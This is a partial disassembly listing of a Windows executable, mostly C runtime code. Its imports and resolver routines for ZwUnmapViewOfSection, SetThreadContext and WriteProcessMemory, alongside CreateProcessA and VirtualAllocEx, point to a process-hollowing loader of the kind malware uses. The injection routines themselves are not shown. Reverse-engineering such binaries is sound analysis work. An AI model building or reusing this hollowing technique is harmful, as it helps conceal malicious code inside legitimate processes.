; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
_fast_error_exit:
cmp dword_43E538, 1
jnz short loc_401E13
call __FF_MSGBANNER
loc_401E13: ; CODE XREF: .text:00401E0C�j
push dword ptr [esp+4]
call __NMSG_WRITE
push 0FFh
call unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
; ---------------------------------------------------------------------------
db 59h ; Y
db 59h ; Y
db 0C3h ; Ã
; ---------------------------------------------------------------------------
_check_managed_app:
push 0
call ds:GetModuleHandleA ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_401E57
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_401E57
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_401E6D
cmp eax, 20Bh
jz short loc_401E5A
loc_401E57: ; CODE XREF: .text:00401E36�j
; .text:00401E43�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_401E5A: ; CODE XREF: .text:00401E55�j
xor eax, eax
cmp dword ptr [ecx+84h], 0Eh
jbe short locret_401E7E
cmp [ecx+0F8h], eax
jmp short loc_401E7B
; ---------------------------------------------------------------------------
loc_401E6D: ; CODE XREF: .text:00401E4E�j
xor eax, eax
cmp dword ptr [ecx+74h], 0Eh
jbe short locret_401E7E
cmp [ecx+0E8h], eax
loc_401E7B: ; CODE XREF: .text:00401E6B�j
setnz al
locret_401E7E: ; CODE XREF: .text:00401E63�j
; .text:00401E73�j
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__heap_term:
cmp dword_43EAD8, 3
jnz short loc_402138
push ebx
xor ebx, ebx
cmp dword_43EABC, ebx
push ebp
mov ebp, ds:HeapFree
jle short loc_402126
push esi
mov esi, lpMem
push edi
mov edi, ds:VirtualFree
add esi, 0Ch
loc_4020F2: ; CODE XREF: .text:00402122�j
push 4000h
push 100000h
push dword ptr [esi]
call edi ; VirtualFree
push 8000h
push 0
push dword ptr [esi]
call edi ; VirtualFree
push dword ptr [esi+4]
push 0
push hHeap
call ebp ; HeapFree
add esi, 14h
inc ebx
cmp ebx, dword_43EABC
jl short loc_4020F2
pop edi
pop esi
loc_402126: ; CODE XREF: .text:004020DF�j
push lpMem
push 0
push hHeap
call ebp ; HeapFree
pop ebp
pop ebx
loc_402138: ; CODE XREF: .text:004020CD�j
push hHeap
call ds:HeapDestroy ; HeapDestroy
retn
; ---------------------------------------------------------------------------
mov eax, hHeap
retn
; [00000015 BYTES: COLLAPSED FUNCTION __get_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___sbh_heapmin:
mov eax, dword_43EAB8
test eax, eax
jz locret_402A57
mov ecx, dword_43EAD0
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
push 8000h
push ecx
call ds:VirtualFree ; VirtualFree
mov ecx, dword_43EAD0
mov eax, dword_43EAB8
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_43EAB8
mov eax, [eax+10h]
mov ecx, dword_43EAD0
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_43EAB8
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_43EAB8
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_4029FE
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_43EAB8
loc_4029FE: ; CODE XREF: .text:004029F3�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_402A50
cmp dword_43EABC, 1
jle short loc_402A50
push dword ptr [eax+10h]
push 0
push hHeap
call ds:HeapFree
mov eax, dword_43EABC
mov edx, lpMem
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_43EAB8
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call _memcpy_0
add esp, 0Ch
dec dword_43EABC
loc_402A50: ; CODE XREF: .text:00402A02�j
; .text:00402A0B�j
and dword_43EAB8, 0
locret_402A57: ; CODE XREF: .text:0040298E�j
retn
; [00000319 BYTES: COLLAPSED FUNCTION ___sbh_heap_check. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION __set_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_43E53C
mov dword_43E53C, ecx
retn
; ---------------------------------------------------------------------------
mov eax, dword_43E53C
retn
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; ---------------------------------------------------------------------------
__initterm:
push esi
mov esi, eax
jmp short loc_403139
; ---------------------------------------------------------------------------
loc_40312E: ; CODE XREF: .text:0040313D�j
mov eax, [esi]
test eax, eax
jz short loc_403136
call eax
loc_403136: ; CODE XREF: .text:00403132�j
add esi, 4
loc_403139: ; CODE XREF: .text:0040312C�j
cmp esi, [esp+8]
jb short loc_40312E
pop esi
retn
; ---------------------------------------------------------------------------
__initterm_e:
push esi
mov esi, eax
xor eax, eax
jmp short loc_403157
; ---------------------------------------------------------------------------
loc_403148: ; CODE XREF: .text:0040315B�j
test eax, eax
jnz short loc_40315D
mov ecx, [esi]
test ecx, ecx
jz short loc_403154
call ecx
loc_403154: ; CODE XREF: .text:00403150�j
add esi, 4
loc_403157: ; CODE XREF: .text:00403146�j
cmp esi, [esp+8]
jb short loc_403148
loc_40315D: ; CODE XREF: .text:0040314A�j
pop esi
retn
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__GET_RTERRMSG:
mov ecx, [esp+4]
xor eax, eax
loc_403447: ; CODE XREF: .text:00403454�j
cmp ecx, dword_408060[eax*8]
jz short loc_403456
inc eax
cmp eax, 13h
jb short loc_403447
loc_403456: ; CODE XREF: .text:0040344E�j
shl eax, 3
cmp ecx, dword_408060[eax]
jnz short loc_403468
mov eax, off_408064[eax]
retn
; ---------------------------------------------------------------------------
loc_403468: ; CODE XREF: .text:0040345F�j
xor eax, eax
retn
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_xcptlookup:
mov ecx, dword_408178
mov eax, offset dword_4080F8
push esi
loc_4034B0: ; CODE XREF: .text:004034C3�j
cmp [eax], edx
jz short loc_4034C5
lea esi, [ecx+ecx*2]
add eax, 0Ch
lea esi, ds:4080F8h[esi*4]
cmp eax, esi
jb short loc_4034B0
loc_4034C5: ; CODE XREF: .text:004034B2�j
lea ecx, [ecx+ecx*2]
lea ecx, ds:4080F8h[ecx*4]
cmp eax, ecx
pop esi
jnb short loc_4034D8
cmp [eax], edx
jz short locret_4034DA
loc_4034D8: ; CODE XREF: .text:004034D2�j
xor eax, eax
locret_4034DA: ; CODE XREF: .text:004034D6�j
retn
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___CppXcptFilter:
mov eax, 0E06D7363h
cmp [esp+4], eax
jnz short loc_403664
push dword ptr [esp+8]
push eax
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_403664: ; CODE XREF: .text:00403655�j
xor eax, eax
retn
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__ioterm:
push esi
mov esi, offset dword_43E9A0
loc_403C6C: ; CODE XREF: .text:00403C85�j
mov eax, [esi]
test eax, eax
jz short loc_403C7C
push eax
call _free
and dword ptr [esi], 0
pop ecx
loc_403C7C: ; CODE XREF: .text:00403C70�j
add esi, 4
cmp esi, offset dword_43EAA0
jl short loc_403C6C
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C89 proc near ; CODE XREF: start:loc_401F72�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_406618
call __SEH_prolog
mov [ebp+var_1C], offset dword_406E0C
loc_403C9C: ; CODE XREF: sub_403C89+3C�j
cmp [ebp+var_1C], offset dword_406E0C
jnb short loc_403CC7
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_403CBD
call eax
jmp short loc_403CBD
; ---------------------------------------------------------------------------
loc_403CB6: ; DATA XREF: .rdata:stru_406618�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_403CBA: ; DATA XREF: .rdata:stru_406618�o
mov esp, [ebp+ms_exc.old_esp]
loc_403CBD: ; CODE XREF: sub_403C89+27�j
; sub_403C89+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_403C9C
; ---------------------------------------------------------------------------
loc_403CC7: ; CODE XREF: sub_403C89+1A�j
call __SEH_epilog
retn
sub_403C89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void sub_403CCD(void)
sub_403CCD proc near ; DATA XREF: __cinit:loc_40319A�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_406628
call __SEH_prolog
mov [ebp+var_1C], offset dword_406E14
loc_403CE0: ; CODE XREF: sub_403CCD+3C�j
cmp [ebp+var_1C], offset dword_406E14
jnb short loc_403D0B
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_403D01
call eax
jmp short loc_403D01
; ---------------------------------------------------------------------------
loc_403CFA: ; DATA XREF: .rdata:stru_406628�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_403CFE: ; DATA XREF: .rdata:stru_406628�o
mov esp, [ebp+ms_exc.old_esp]
loc_403D01: ; CODE XREF: sub_403CCD+27�j
; sub_403CCD+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_403CE0
; ---------------------------------------------------------------------------
loc_403D0B: ; CODE XREF: sub_403CCD+1A�j
call __SEH_epilog
retn
sub_403CCD endp
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_40469C. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_404688 proc near ; DATA XREF: .rdata:stru_4066A8�o
xor eax, eax
inc eax
retn
sub_404688 endp
; =============== S U B R O U T I N E =======================================
sub_40468C proc near ; DATA XREF: .rdata:stru_4066A8�o
mov esp, [ebp-18h]
sub_40468C endp ; sp-analysis failed
; [0000000C BYTES: COLLAPSED CHUNK OF FUNCTION sub_40469C. PRESS KEYPAD "+" TO EXPAND]
align 4
; [0000000E BYTES: COLLAPSED FUNCTION sub_40469C. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 1
push 0
push dword ptr [esp+0Ch]
call _x_ismbbtype
add esp, 0Ch
retn
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalnum. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalpha. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbgraph. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbtrail. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __ismbbkana. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_getSystemCP:
and dword_43E6C0, 0
cmp eax, 0FFFFFFFEh
jnz short loc_4047D6
mov dword_43E6C0, 1
jmp ds:GetOEMCP
; ---------------------------------------------------------------------------
loc_4047D6: ; CODE XREF: .text:004047C4�j
cmp eax, 0FFFFFFFDh
jnz short loc_4047EB
mov dword_43E6C0, 1
jmp ds:GetACP
; ---------------------------------------------------------------------------
loc_4047EB: ; CODE XREF: .text:004047D9�j
cmp eax, 0FFFFFFFCh
jnz short locret_4047FF
mov eax, dword_43E730
mov dword_43E6C0, 1
locret_4047FF: ; CODE XREF: .text:004047EE�j
retn
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION __getmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_408290
jmp short loc_404D10
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_43E714
mov dword_43E714, ecx
retn
; ---------------------------------------------------------------------------
___buffer_overrun:
push 0
push 1
call ___security_error_handler
; ---------------------------------------------------------------------------
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov eax, off_4082A4
retn
; ---------------------------------------------------------------------------
mov eax, off_4082A0
retn
; ---------------------------------------------------------------------------
_strncnt:
mov ecx, [esp+4]
test ecx, ecx
jz short loc_4052CA
loc_4052BF: ; CODE XREF: .text:004052C8�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4052CB
inc eax
test ecx, ecx
jnz short loc_4052BF
loc_4052CA: ; CODE XREF: .text:004052BD�j
dec ecx
loc_4052CB: ; CODE XREF: .text:004052C3�j
mov eax, [esp+4]
sub eax, ecx
dec eax
retn
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp _atol
; [00000079 BYTES: COLLAPSED FUNCTION __atoi64. PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__chvalidator:
mov eax, [esp+4]
mov ecx, off_4082A0
movzx eax, word ptr [ecx+eax*2]
and eax, [esp+8]
retn
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
align 2
jmp ds:FreeLibrary
; ---------------------------------------------------------------------------
jmp ds:GetProcAddress
; ---------------------------------------------------------------------------
jmp ds:LoadLibraryA
; ---------------------------------------------------------------------------
jmp ds:VirtualQueryEx
; ---------------------------------------------------------------------------
jmp ds:ReadProcessMemory
; ---------------------------------------------------------------------------
jmp ds:GetThreadContext
; ---------------------------------------------------------------------------
jmp ds:CreateProcessA
; ---------------------------------------------------------------------------
jmp ds:GetModuleHandleA
; ---------------------------------------------------------------------------
jmp ds:VirtualProtectEx
; ---------------------------------------------------------------------------
jmp ds:VirtualAllocEx
; ---------------------------------------------------------------------------
jmp ds:ResumeThread
; ---------------------------------------------------------------------------
jmp ds:ReadFile
; ---------------------------------------------------------------------------
jmp ds:GetFileSize
; ---------------------------------------------------------------------------
jmp ds:CreateFileA
; ---------------------------------------------------------------------------
jmp ds:lstrcmpA
; ---------------------------------------------------------------------------
jmp ds:SetFileAttributesA
; ---------------------------------------------------------------------------
jmp ds:GetModuleFileNameA
; ---------------------------------------------------------------------------
jmp ds:HeapAlloc
; ---------------------------------------------------------------------------
jmp ds:GetStartupInfoA
; ---------------------------------------------------------------------------
jmp ds:GetCommandLineA
; ---------------------------------------------------------------------------
jmp ds:GetVersionExA
; ---------------------------------------------------------------------------
jmp ds:HeapDestroy
; ---------------------------------------------------------------------------
jmp ds:HeapCreate
; ---------------------------------------------------------------------------
jmp ds:VirtualFree
; ---------------------------------------------------------------------------
jmp ds:HeapFree
; ---------------------------------------------------------------------------
jmp ds:VirtualAlloc
; ---------------------------------------------------------------------------
jmp ds:HeapReAlloc
; ---------------------------------------------------------------------------
jmp ds:IsBadWritePtr
; ---------------------------------------------------------------------------
jmp ds:ExitProcess
; ---------------------------------------------------------------------------
jmp ds:TerminateProcess
; ---------------------------------------------------------------------------
jmp ds:GetCurrentProcess
; ---------------------------------------------------------------------------
jmp ds:WriteFile
; ---------------------------------------------------------------------------
jmp ds:GetStdHandle
; ---------------------------------------------------------------------------
jmp ds:UnhandledExceptionFilter
; ---------------------------------------------------------------------------
jmp ds:FreeEnvironmentStringsA
; ---------------------------------------------------------------------------
jmp ds:GetEnvironmentStrings
; ---------------------------------------------------------------------------
jmp ds:FreeEnvironmentStringsW
; ---------------------------------------------------------------------------
jmp ds:WideCharToMultiByte
; ---------------------------------------------------------------------------
jmp ds:GetLastError
; ---------------------------------------------------------------------------
jmp ds:GetEnvironmentStringsW
; ---------------------------------------------------------------------------
jmp ds:SetHandleCount
; ---------------------------------------------------------------------------
jmp ds:GetFileType
; ---------------------------------------------------------------------------
jmp ds:GetACP
; ---------------------------------------------------------------------------
jmp ds:GetOEMCP
; ---------------------------------------------------------------------------
jmp ds:GetCPInfo
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp ds:InterlockedExchange
; ---------------------------------------------------------------------------
jmp ds:VirtualQuery
; ---------------------------------------------------------------------------
jmp ds:HeapSize
; ---------------------------------------------------------------------------
jmp ds:QueryPerformanceCounter
; ---------------------------------------------------------------------------
jmp ds:GetTickCount
; ---------------------------------------------------------------------------
jmp ds:GetCurrentThreadId
; ---------------------------------------------------------------------------
jmp ds:GetCurrentProcessId
; ---------------------------------------------------------------------------
jmp ds:GetSystemTimeAsFileTime
; ---------------------------------------------------------------------------
jmp ds:LCMapStringA
; ---------------------------------------------------------------------------
jmp ds:MultiByteToWideChar
; ---------------------------------------------------------------------------
jmp ds:LCMapStringW
; ---------------------------------------------------------------------------
jmp ds:GetStringTypeA
; ---------------------------------------------------------------------------
jmp ds:GetStringTypeW
; ---------------------------------------------------------------------------
jmp ds:GetLocaleInfoA
; ---------------------------------------------------------------------------
jmp ds:VirtualProtect
; ---------------------------------------------------------------------------
jmp ds:GetSystemInfo
; ---------------------------------------------------------------------------
jmp ds:MessageBoxA
; ---------------------------------------------------------------------------
jmp ds:GetUserNameA
; =============== S U B R O U T I N E =======================================
sub_405F66 proc near ; DATA XREF: .data:00408008�o
push offset aZwunmapviewofs ; "ZwUnmapViewOfSection"
push offset LibFileName ; "ntdll.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_43E528, eax
retn
sub_405F66 endp
; =============== S U B R O U T I N E =======================================
sub_405F83 proc near ; DATA XREF: .data:0040800C�o
push offset aSetthreadconte ; "SetThreadContext"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_43E52C, eax
retn
sub_405F83 endp
; =============== S U B R O U T I N E =======================================
sub_405FA0 proc near ; DATA XREF: .data:00408010�o
push offset aWriteprocessme ; "WriteProcessMemory"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_43E524, eax
retn
sub_405FA0 endp
; ---------------------------------------------------------------------------
align 80h
_text ends
; Section 2. (virtual address 00006000)
; Virtual size : 000013FC ( 5116.)
; Section size in file : 00001400 ( 5120.)
; Offset to raw data for section: 00005400
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall GetUserNameA(LPSTR lpBuffer,LPDWORD pcbBuffer)
extrn GetUserNameA:dword ; CODE XREF: sub_4017DA+24�p
; DATA XREF: sub_4017DA+24�r ...
;
; Imports from KERNEL32.dll
;
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_401000+21�p
; ___crtMessageBoxA+18�p
; DATA XREF: ...
; SIZE_T __stdcall VirtualQueryEx(HANDLE hProcess,LPCVOID lpAddress,PMEMORY_BASIC_INFORMATION lpBuffer,SIZE_T dwLength)
extrn VirtualQueryEx:dword ; CODE XREF: sub_4014E8+83�p
; DATA XREF: sub_4014E8+66�r ...
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess,LPCVOID lpBaseAddress,LPVOID lpBuffer,SIZE_T nSize,SIZE_T *lpNumberOfBytesRead)
extrn ReadProcessMemory:dword ; CODE XREF: sub_4014E8+5E�p
; DATA XREF: sub_4014E8+5E�r ...
; BOOL __stdcall GetThreadContext(HANDLE hThread,LPCONTEXT lpContext)
extrn GetThreadContext:dword ; CODE XREF: sub_4014E8+42�p
; DATA XREF: sub_4014E8+42�r ...
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName,LPSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCSTR lpCurrentDirectory,LPSTARTUPINFOA lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_4014E8+2A�p
; DATA XREF: sub_4014E8+2A�r ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_4015A2+E0�p
; WinMain(x,x,x,x)+A6�p ...
; BOOL __stdcall VirtualProtectEx(HANDLE hProcess,LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect)
extrn VirtualProtectEx:dword ; CODE XREF: sub_4015A2+3A�p
; DATA XREF: sub_4015A2+3A�r ...
; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess,LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAllocEx:dword ; CODE XREF: sub_4015A2+72�p
; sub_4015A2+9E�p
; DATA XREF: ...
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: sub_401707+D�p
; DATA XREF: sub_401707+D�r ...
; BOOL __stdcall ReadFile(HANDLE hFile,LPVOID lpBuffer,DWORD nNumberOfBytesToRead,LPDWORD lpNumberOfBytesRead,LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_40171B+53�p
; DATA XREF: sub_40171B+53�r ...
; DWORD __stdcall GetFileSize(HANDLE hFile,LPDWORD lpFileSizeHigh)
